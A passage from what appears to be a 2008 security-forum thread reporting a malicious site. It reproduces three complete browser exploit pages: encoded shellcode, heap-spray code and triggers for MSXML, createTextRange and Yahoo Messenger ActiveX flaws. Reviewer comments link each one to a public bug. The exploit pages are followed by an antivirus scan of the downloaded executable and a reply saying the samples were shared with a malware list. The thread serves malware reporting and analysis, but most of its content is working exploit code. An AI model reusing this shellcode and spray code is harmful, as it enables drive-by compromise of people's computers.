%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u2E2E%u6C2F%u616F%u2F64%u6966%u656C%u652E%u6578";
   

   var hSTyA = 0x05050505;

   var hScode = shellcode;
   var hPPcLSs = unescape(hScode);
   
</script>
<script>
   var hBFFSSx = 0x400000;

   var hPpll = hPPcLSs.length * 2;
        ff=hPpll+0x38
   var XusASSs = hBFFSSx - ff;

   var StyleSX = unescape("%u9090%u9090");
   StyleSX = getStyleSX(StyleSX,XusASSs);
        ee=hSTyA - 0x400000
   hB = ee/hBFFSSx;

   memory = new Array();

   for (i=0;i<hB;i++)
      memory[i] = StyleSX + hPPcLSs;

   function getStyleSX(StyleSX, XusASSs)
   {
      while (StyleSX.length*2<XusASSs)
      {
         StyleSX += StyleSX;
      }
      StyleSX = StyleSX.substring(0,XusASSs/2);
      return StyleSX;
   }

</script>
<object id=target classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5" >
</object>
<script>
// Trigger against the <object id=target> above (clsid
// 88d969c5-f192-11d4-a65f-0040963251e5). open() is first called with array
// arguments (errors swallowed), then with objects, and setRequestHeader() is
// called repeatedly with object / integer arguments.
// NOTE(review): the CLSID and call shape match public write-ups of the MSXML 4
// XMLHTTP setRequestHeader bug (MS06-071) — confirm. The kill-bit for this
// CLSID is the mitigation; the repeated setRequestHeader calls with non-string
// arguments are the script-level signature.
var obj = null;

obj = document.getElementById('target').object;

try {
obj.open(new Array(),new Array(),new Array(),new Array(),new Array());
} catch(e) {};

obj.open(new Object(),new Object(),new Object(),new Object(), new Object());   

obj.setRequestHeader(new Object(),'......');
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);

</script>


</body></html>


<HTML><HEAD><SCRIPT language="javascript">
// Trigger: createTextRange() on the checkbox <INPUT id="focus"> in the body,
// called by Run_BOF once the spray is in place. oElreem is just the element
// id. NOTE(review): this call shape matches the public IE
// createTextRange-on-checkbox bug (MS06-013 era) — confirm.
function Crash() {
var oElreem="focus";
var oR = document.getElementById(oElreem).createTextRange();
}
sfxdRR="%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F
%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u2E2E%u6C2F%u616F%u2F64%u6966%u656C%u652E%u6578";

// sfxdRR is immediately replaced by a global `shellcode` that this listing
// does not define — presumably supplied by a wrapper page not shown; confirm.
// slle is the UTF-16 form used by the spray.
sfxdRR = shellcode;

var slle=unescape(sfxdRR);
// Heap spray up to hssPPA (0x3c0974c2) using the same slide builder as the
// other pages in this post, then Crash() fires the trigger. frt, hB, mmr and
// i are implicit globals.
function Run_BOF() {
var hssPPA = 0x3c0974c2;
var hBFFSSx = 0x400000;
var hPpll = slle.length * 2;
frt=hPpll+0x38;
var XusASSs = hBFFSSx - frt;
ret="%u9090%u9090";
var StyleSX = unescape(ret);
StyleSX = getStyleSX(StyleSX,XusASSs);
hB = (hssPPA - 0x400000)/hBFFSSx;
mmr = new Array();
for (i=0;i<hB;i++) {
    mmr[i] = StyleSX + slle;
    }
Crash();
}

// Doubles the seed until it covers XusASSs bytes (2 bytes per JS character),
// then trims to XusASSs/2 characters. Same builder as on the other pages.
function getStyleSX(StyleSX, XusASSs) {
   while (StyleSX.length*2<XusASSs) {
         StyleSX += StyleSX;
   }
   StyleSX = StyleSX.substring(0,XusASSs/2);
   return StyleSX;
}

</SCRIPT></HEAD>
<BODY onload="Run_BOF()"><INPUT id="focus" type="checkbox"></BODY></HTML>

<html>
<object
classid='clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277'
id='target'>
</object>
<script>

ure="%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353
%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u2E2E%u6C2F%u616F%u2F64%u6966%u656C%u652E%u6578";

// Trigger against the <object id=target> above (clsid 9D39223E-...). ure is
// replaced by a global `shellcode` not defined in this listing, and
// `blocksad` is read before any definition here — presumably both come from
// an outer page not shown; confirm. After the spray (800 blocks of
// blocksad + shellcode), a 5000+ character string of \x0a is assigned to the
// control's `server` property before receive() is called.
// NOTE(review): the server/receive() pair on this CLSID matches public
// write-ups of the Yahoo! Messenger webcam upload ActiveX overflow (2007) —
// confirm against the CLSID. The kill-bit for the control is the mitigation.
ure = shellcode;

shecode = unescape(ure);
sadw="%u9090%u9090";
bbl = unescape(sadw);
hea = 20;
slapace = hea+shecode.length
while (bbl.length<slapace) bbl+=bbl;
fllk = bbl.substring(0, slapace);
block = bbl.substring(0, bbl.length-slapace);
ders= blocksad.length + slapace
while(ders<0x40000) blocksad = blocksad+blocksad+fllk;
memory = new Array();
for (x=0; x<800; x++) memory[x] = blocksad + shecode;
var buff = '\x0a';
while (buff.length < 5000) buff+='\x0a\x0a\x0a\x0a';
target.server = buff;
target.receive();
</script>
</html>


and finally
hxxp://www.dir4you.org/6/file.php?test11
which is being saved as file.exe
Quote:

av detection: 4/32 (12.50%)

AhnLab-V3 2008.4.10.2 2008.04.11 -
AntiVir 7.6.0.84 2008.04.11 -
Authentium 4.93.8 2008.04.10 -
Avast 4.8.1169.0 2008.04.11 -
AVG 7.5.0.516 2008.04.10 -
BitDefender 7.2 2008.04.11 BehavesLike:Trojan.WUDisable
CAT-QuickHeal 9.50 2008.04.10 -
ClamAV 0.92.1 2008.04.11 -
DrWeb 4.44.0.09170 2008.04.11 -
eSafe 7.0.15.0 2008.04.09 -
eTrust-Vet 31.3.5687 2008.04.10 -
Ewido 4.0 2008.04.10 -
F-Prot 4.4.2.54 2008.04.10 -
F-Secure 6.70.13260.0 2008.04.11 Trojan-Downloader.NSIS.Agent.at
FileAdvisor 1 2008.04.11 -
Fortinet 3.14.0.0 2008.04.10 Adware/Vapsup.0408
Ikarus T3.1.1.26 2008.04.11 -
Kaspersky 7.0.0.125 2008.04.11 Trojan-Downloader.NSIS.Agent.at
McAfee 5271 2008.04.10 -
Microsoft 1.3408 2008.04.11 -
NOD32v2 3018 2008.04.11 -
Norman 5.80.02 2008.04.10 -
Panda 9.0.0.4 2008.04.10 -
Prevx1 V2 2008.04.11 -
Rising 20.39.32.00 2008.04.10 -
Sophos 4.28.0 2008.04.11 -
Sunbelt 3.0.1032.0 2008.04.08 -
Symantec 10 2008.04.11 -
TheHacker 6.2.92.273 2008.04.11 -
VBA32 3.12.6.4 2008.04.06 -
VirusBuster 4.3.26:9 2008.04.10 -
Webwasher-Gateway 6.6.2 2008.04.11 -

Further information
File size: 40849 bytes
MD5...: 091b27bc8163b6802799db33a2b29120
SHA1..: 085188e3fa4bf6187f67bbe23ee9976aac7c5424
SHA256: f4ebc206ccf12f70ae6a1ac2882879fde77a467b8ce1fa32afc9dbd0cc43da79
SHA512: 5b62c0919d7d07fff715de59baa32159a504dd620eb2caf60242dc65b026ab5a
897b4bd55595996dc0d807b628dde901a7120def9f0def78843a87a8ec0034aa
PEiD..: -
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x403225
timedatestamp.....: 0x47acc8b2 (Fri Feb 08 21:25:06 2008)
machinetype.......: 0x14c (I386)

( 5 sections )
name viradd virsiz rawdsiz ntrpy md5
.text 0x1000 0x5934 0x5a00 6.46 663546ac41801daf2dc51f560ec05a56
.rdata 0x7000 0x1190 0x1200 5.18 db16645055619c0cc73276ff5c3adb75
.data 0x9000 0x1af98 0x400 4.70 f0511f18783910813a0de0de02bc1206
.ndata 0x24000 0x8000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
.rsrc 0x2c000 0x6c8 0x800 2.92 b3eea649cd2c734f0ff0d05dd8d99ef5

( 8 imports )
> KERNEL32.dll: CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
> USER32.dll: EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
> GDI32.dll: SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
> SHELL32.dll: SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
> ADVAPI32.dll: RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
> COMCTL32.dll: ImageList_AddMasked, ImageList_Destroy, -, ImageList_Create
> ole32.dll: CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
> VERSION.dll: GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

( 0 exports )


as a side note i want to mention that i found a login form here:
hxxp://www.dir4you.org/TDS/

tetak


Joined: Jan 19, 2007
Posts: 5879


PostPosted: Sat Apr 12, 2008 8:52 pm    Post subject:

I've added all the exploits and the .exe file to the malware listserv.


_________________
Got Windows XP? Help protect your PC from malware with Microsoft's anti-spyware program Windows Defender.

Download it for free from http://www.microsoft.com/athome/security/spyware/software/default.mspx